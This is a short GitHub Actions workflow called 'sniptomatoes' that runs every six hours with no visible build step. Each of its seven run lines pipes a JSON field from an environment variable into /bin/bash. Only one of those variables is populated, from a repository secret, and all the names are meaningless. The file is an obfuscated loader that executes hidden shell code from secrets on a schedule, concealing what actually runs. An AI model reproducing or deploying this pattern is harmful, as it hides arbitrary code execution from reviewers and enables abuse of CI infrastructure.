name: sniptomatoes
on:
  workflow_dispatch:
  schedule:
    - cron: '28 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: sniptomatoes
        env:
          qip78731: ${{ secrets.qip78731 }}
        run: |
          echo $qip78731 | jq -r .l35 | /bin/bash
          echo $s23 | jq -r .uf07 | /bin/bash
          echo $pren7731 | jq -r .scmmu1 | /bin/bash
          echo $q21 | jq -r .rqkg1 | /bin/bash
          echo $qrpa0 | jq -r .alcx56107 | /bin/bash
          echo $edyr09 | jq -r .ees0177 | /bin/bash
          echo $bc98 | jq -r .l6719 | /bin/bash

